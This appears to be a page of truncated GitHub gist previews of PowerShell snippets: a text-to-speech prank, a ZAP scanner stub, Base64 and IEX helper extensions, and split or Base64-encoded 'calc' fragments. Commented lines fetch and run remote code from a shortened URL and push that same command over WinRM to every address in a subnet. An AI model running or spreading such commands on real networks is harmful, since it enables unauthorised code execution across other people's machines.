This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Out-Loud(){ | |
Param( | |
#Message | |
[Parameter(Mandatory=$true, ValueFromPipeline=$true, Position=0)] | |
[ValidateNotNull()] | |
[String[]]$Text, | |
#Voice | |
[ValidateSet('David', 'Zira', 'Hazel')] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
View -> Acsrf | |
.DESCRIPTION | |
PoSh WebApp ZapBot... | |
See OWASP ZAP documentation for more info. | |
.EXAMPLE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -Ass System.Speech;$S=New-Object System.Speech.Synthesis.SpeechSynthesizer;$S.volume=100;$L="We are no strangers to love... You know the rules and so do I. A full commitment is what I am thinking of. You wouldn't get this from any other computer... I just want to tell you how I am feeling... I have got to make you understand: Never gonna give you up, never gonna let you down; Never gonna run around and desert you. Never gonna make you cry, never gonna say goodbye. Never gonna tell a lie and ... hur-urt you.";$S.Speak($L) | |
### Send a bit of love to yourself | |
# iex(iwr http://bit.ly/2gXq9fu).content | |
### Send Loads of Love to your SubNet over WinRM | |
# 1..254|%{icm 10.0.1.$_{iex(iwr http://bit.ly/2gXq9fu).content}-ea si} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Inline B64CMD Converter (Add to PoSh Profile) | |
## via System.String Type Custom ScriptProperty Member | |
# Base64 Encode/Decode | |
Update-TypeData -TypeName System.String -MemberName "ToB64" -MemberType scriptproperty -Value {[System.Convert]::ToBase64String([System.Text.Encoding]::UNICODE.GetBytes($this))} | |
Update-TypeData -TypeName System.String -MemberName "FromB64" -MemberType scriptproperty -Value {[System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($this))} | |
# Add iex | |
Update-TypeData -TypeName System.String -MemberName "AddIEX" -MemberType scriptproperty -Value {"iex (`"$this`")"} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
####################################################### | |
#region SyntaxISEr #################################### | |
## Function Invoke-SyntaxISEr | |
## BackBone Tool for Invoke-CyberISEr - Exported (?) | |
<# | |
.Synopsis | |
ISE ScriptPane Explorer | |
.DESCRIPTION |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
calc |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ca |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
lc |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
YwBhAG |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wAYwA= |